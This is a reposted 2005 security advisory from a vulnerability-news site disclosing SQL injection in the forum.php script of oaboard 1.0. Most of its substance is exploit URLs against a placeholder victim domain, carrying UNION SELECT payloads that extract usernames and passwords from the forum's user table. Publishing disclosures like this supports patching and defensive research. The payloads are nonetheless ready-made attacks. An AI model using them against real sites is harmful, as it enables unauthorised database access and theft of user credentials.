Computer Security

Security Advisory: SQL IN FORUM.PHP
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Web applications security vulnerabilities (PHP, ASP, CGI, Perl, etc)

  Portcullis Security Advisory - Movable Type

  Secunia Research: cPanel Entropy Chat Script Insertion Vulnerability

  [Full-disclosure] Invision Power Board Privilege Escalation (2.0.1 + more)

  [SA17359] vBulletin Image Script Insertion Vulnerability

From:abducter_minds_(at)_yahoo.com <abducter_minds_(at)_yahoo.com>
Date:01.11.2005
Subject:SQL IN FORUM.PHP

Class:  Input Validation Error  
CVE:  CVE-MAP-NOMATCH  
Remote:  Yes  
Discovered BY ABDUCTER & Expliot BY DEVIL-00
             ABDUCTER_MINDS@S4A.CC (OR) ABDUCTER_MINDS@YAHOO.COM
Vulnerable:powered by oaboard 1.0
//////////////////////////////////
info:- FOR INFORMATION VISIT http://oaboard.myserver.at/oaboard/forum.php
/////////////////////////////////
discussion: THERE IS SQL IN FORUM.PHP
*********************************
EXPLIOTS AND EXAMPLE
--------------------
//-------1---------//
http://WWW.VICTIM.COM/oaboard/forum.php?modul=topics&channel=[SQL]
http://WWW.VICTIM.COM/oaboard/forum.php?modul=topics&channel=-99%20UNION%
20SELECT%20null,password%20FROM%20pw99_user%20WHERE%20id=1
//-------2--------//
http://WWW.VICTIM.COM/oaboard/forum.php?modul=posting&topic=[SQL]&channel
=3
http://oWWW.VICTIM.COM/oaboard/forum.php?modul=posting&topic=30%20UNION%
20SELECT%20null,username,null,
password%20FROM%20pw99_user%20WHERE%20id=1/*&channel=3
*********************************
CREDITS S4A.CC FOR ALL GEEKS
       FOR AL ARAB
       HACKER PAL
       MY LOVE (N0N0)

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru